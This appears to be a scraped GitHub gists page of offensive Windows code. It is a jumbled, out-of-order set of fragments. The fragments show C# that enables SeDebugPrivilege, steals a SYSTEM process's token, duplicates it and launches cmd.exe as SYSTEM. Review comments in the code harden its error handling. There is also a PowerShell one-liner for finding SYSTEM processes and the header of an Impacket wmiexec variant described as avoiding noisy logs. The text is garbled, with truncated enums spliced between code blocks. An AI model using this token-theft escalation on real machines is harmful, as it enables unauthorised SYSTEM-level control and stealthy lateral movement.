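// Duplicate the captured token as a *primary* token and spawn cmd.exe under it.
// Assumes `tokenHandle` (opened earlier with at least TOKEN_DUPLICATE) is in scope.
// CreateProcessWithTokenW requires SeImpersonatePrivilege in the calling process; without it
// the call fails with ERROR_PRIVILEGE_NOT_HELD.
myAPI.SECURITY_IMPERSONATION_LEVEL seImpersonateLevel = myAPI.SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation;
// CreateProcessWithTokenW takes a primary token, hence TokenPrimary rather than TokenImpersonation.
myAPI.TOKEN_TYPE tokenType = myAPI.TOKEN_TYPE.TokenPrimary;
IntPtr pNewToken;
// Zero-initialised SECURITY_ATTRIBUTES (nLength == 0, no security descriptor, not inheritable).
// NOTE(review): the Win32 API accepts NULL here; confirm myAPI's DuplicateTokenEx signature
// intends a zeroed struct rather than IntPtr.Zero.
myAPI.SECURITY_ATTRIBUTES sec_att = new myAPI.SECURITY_ATTRIBUTES();
// TOKEN_ALL_ACCESS is broader than CreateProcessWithTokenW needs (TOKEN_QUERY | TOKEN_DUPLICATE |
// TOKEN_ASSIGN_PRIMARY suffice). Kept as-is because code after this snippet may use the token further;
// narrow it if it does not.
if (!myAPI.DuplicateTokenEx(tokenHandle, myAPI.TOKEN_ALL_ACCESS, ref sec_att, seImpersonateLevel, tokenType, out pNewToken))
{
    Console.WriteLine("Can't Adjust access Token");
    Environment.Exit(2);
}
// NOTE(review): si.cb is left at 0 here; the Win32 docs say cb should be sizeof(STARTUPINFO).
// Set it if myAPI.STARTUPINFO exposes the field — confirm against the struct definition.
myAPI.STARTUPINFO si = new myAPI.STARTUPINFO();
myAPI.PROCESS_INFORMATION pi;
// NetCredentialsOnly == LOGON_NETCREDENTIALS_ONLY: no user profile is loaded for the new process
// (LOGON_WITH_PROFILE is not set). NewConsole == CREATE_NEW_CONSOLE gives cmd.exe its own window.
bool ret = myAPI.CreateProcessWithTokenW(pNewToken, myAPI.LogonFlags.NetCredentialsOnly, "C:\\Windows\\System32\\cmd.exe", null, myAPI.CreationFlags.NewConsole, IntPtr.Zero, null, ref si, out pi);
// Fix: the original never checked `ret`, so a failed launch (missing SeImpersonatePrivilege,
// wrong token type, bad access mask) went unnoticed and `pi` held garbage. Report and exit like
// the other error paths. GetLastWin32Error is only meaningful if myAPI's DllImport for
// CreateProcessWithTokenW sets SetLastError = true — confirm.
if (!ret)
{
    Console.WriteLine("CreateProcessWithTokenW failed, Win32 error " + System.Runtime.InteropServices.Marshal.GetLastWin32Error());
    Environment.Exit(2);
}
// Handles left open on purpose: pNewToken, pi.hProcess and pi.hThread may be used by the code that
// follows this snippet; close them with CloseHandle once they are no longer needed.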
shelld0n / CreateProcessWithToken_definitions.cs
Created Feb 1, 2020
CreateProcessWithToken_definitions
/// <summary>
/// dwLogonFlags values accepted by CreateProcessWithTokenW (winbase.h LOGON_* constants).
/// Exactly one of these is passed; they are not combined.
/// </summary>
public enum LogonFlags
{
    /// <summary>LOGON_WITH_PROFILE: load the token owner's user profile into HKEY_USERS before the process starts.</summary>
    WithProfile = 0x00000001,

    /// <summary>LOGON_NETCREDENTIALS_ONLY: the token is used for local access; network access keeps the caller's credentials. No profile is loaded.</summary>
    NetCredentialsOnly = 0x00000002,
}
public enum CreationFlags
{
DefaultErrorMode = 0x04000000,
NewConsole = 0x00000010,
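// Open a handle to the target SYSTEM process (identified by `pid`, supplied by the caller) and then
// to its access token. The token handle is left in `tokenHandle` for the duplication step that
// follows. Nothing is duplicated here yet.
Console.WriteLine("your journey just started");
// PROCESS_QUERY_INFORMATION satisfies the access OpenProcessToken needs on the process handle.
// Opening a SYSTEM-owned process this way only works once SeDebugPrivilege is enabled in the
// calling process (see the SeDebugPrivilege routine).
// NOTE(review): bInheritHandle = true is not needed by anything here and makes a handle to a SYSTEM
// process inheritable by child processes; kept to preserve behaviour, but `false` is the tighter choice.
IntPtr test = myAPI.OpenProcess(myAPI.ProcessAccessFlags.QueryInformation, true, pid);
// Fix: the original printed a message and carried on, so OpenProcessToken was then called with a
// NULL process handle. Exit here, as the other error paths in this program do.
if (test == IntPtr.Zero)
{
    Console.WriteLine("No Handle to process !");
    Environment.Exit(2);
}
IntPtr tokenHandle;
// TOKEN_DUPLICATE is what DuplicateTokenEx requires on the source token; TOKEN_READ already
// includes TOKEN_QUERY. TOKEN_IMPERSONATE is requested as well but is not needed for duplication.
bool result_token = myAPI.OpenProcessToken(test, myAPI.TOKEN_READ | myAPI.TOKEN_IMPERSONATE | myAPI.TOKEN_DUPLICATE, out tokenHandle);
Console.WriteLine(result_token);
// Fix: stop on failure instead of handing an invalid token handle to the duplication step.
if (!result_token)
{
    Console.WriteLine("Can't open the token of process " + pid);
    Environment.Exit(2);
}
//End of getting the handle of token of SYSTEM process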
// see http://www.pinvoke.net/default.aspx/kernel32/OpenProcess.html
[Flags]
public enum ProcessAccessFlags : uint
{
All = 0x001F0FFF,
Terminate = 0x00000001,
CreateThread = 0x00000002,
VirtualMemoryOperation = 0x00000008,
VirtualMemoryRead = 0x00000010,
VirtualMemoryWrite = 0x00000020,
// Enable SeDebugPrivilege Routine: open this process's own token and build the TOKEN_PRIVILEGES
// structure (`tp`) that the following AdjustTokenPrivileges call applies to it. SeDebugPrivilege
// is what later lets OpenProcess succeed against SYSTEM-owned processes; it is only present in
// the token of an elevated (administrator) process, so this must run from an elevated prompt.
string Privilege = "SeDebugPrivilege";
myAPI.LUID luid = new myAPI.LUID();
IntPtr hProcess = myAPI.GetCurrentProcess();
IntPtr hToken;
// TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES is the minimum AdjustTokenPrivileges needs on our own token.
bool openedOwnToken = myAPI.OpenProcessToken(hProcess, myAPI.TOKEN_QUERY | myAPI.TOKEN_ADJUST_PRIVILEGES, out hToken);
if (!openedOwnToken)
{
    Console.WriteLine("No tokens for current process");
    Environment.Exit(2);
}
// Resolve the privilege name to its LUID on the local system (null system name = this machine).
bool resolvedLuid = myAPI.LookupPrivilegeValue(null, Privilege, out luid);
if (!resolvedLuid)
{
    Console.WriteLine("No handle for privilege");
    Environment.Exit(2);
}
// A single privilege entry, marked SE_PRIVILEGE_ENABLED.
myAPI.LUID_AND_ATTRIBUTES luAttr = new myAPI.LUID_AND_ATTRIBUTES
{
    Luid = luid,
    Attributes = myAPI.LUID_AND_ATTRIBUTES.SE_PRIVILEGE_ENABLED,
};
myAPI.TOKEN_PRIVILEGES tp = new myAPI.TOKEN_PRIVILEGES
{
    PrivilegeCount = 1,
    Privileges = new myAPI.LUID_AND_ATTRIBUTES[] { luAttr },
};
// NOTE(review): when `tp` is passed to AdjustTokenPrivileges, a TRUE return is not sufficient —
// the call also returns TRUE with GetLastError() == ERROR_NOT_ALL_ASSIGNED when the privilege is
// simply absent from the token (non-elevated caller). Check for that before relying on it.
// see https://www.pinvoke.net/default.aspx/advapi32.openprocesstoken
// Access-mask bits from winnt.h. Standard rights live in bits 16-23; token-specific rights in the
// low 16 bits. Combine with | when opening or duplicating a token.
public const uint STANDARD_RIGHTS_REQUIRED = 0x000F0000; // DELETE | READ_CONTROL | WRITE_DAC | WRITE_OWNER
public const uint STANDARD_RIGHTS_READ     = 0x00020000; // READ_CONTROL
public const uint TOKEN_ASSIGN_PRIMARY     = 0x00000001; // attach the token to a process as its primary token
public const uint TOKEN_DUPLICATE          = 0x00000002; // needed on the source token for DuplicateToken(Ex)
public const uint TOKEN_IMPERSONATE        = 0x00000004; // attach an impersonation token to a thread
public const uint TOKEN_QUERY              = 0x00000008; // read token contents (GetTokenInformation)
public const uint TOKEN_QUERY_SOURCE       = 0x00000010; // read the token source
public const uint TOKEN_ADJUST_PRIVILEGES  = 0x00000020; // enable/disable privileges (AdjustTokenPrivileges)
public const uint TOKEN_ADJUST_GROUPS      = 0x00000040; // adjust group attributes
// Luid Structure Definition — mirrors winnt.h LUID, the 64-bit locally unique identifier that
// LookupPrivilegeValue returns for a privilege name. Layout must stay DWORD + LONG (8 bytes) for marshalling.
[StructLayout(LayoutKind.Sequential)]
public struct LUID
{
    public uint LowPart;  // DWORD LowPart
    public int HighPart;  // LONG  HighPart
}
[StructLayout(LayoutKind.Sequential)]
public struct LUID_AND_ATTRIBUTES
shelld0n / get_pid.ps1
Created Jan 31, 2020
get PID of system process
Get-Process -IncludeUserName | Where-Object {$_.USERNAME -Like '*SYSTEM*'} | select ProcessName, Id, Handles
shelld0n / SYSTEM.cs
Last active Dec 30, 2019
SYSTEM Draft
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Runtime.InteropServices;
namespace Token
{
class Program
shelld0n / wmiexec_server_mode.py
Created Sep 20, 2019
Impacket wmiexec.py implementation supporting SERVER mode
#!/usr/bin/env python
# SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# A similar approach to smbexec but executing commands through WMI.
# Main advantage here is it runs under the user (has to be Admin)
# account, not SYSTEM, plus, it doesn't generate noisy messages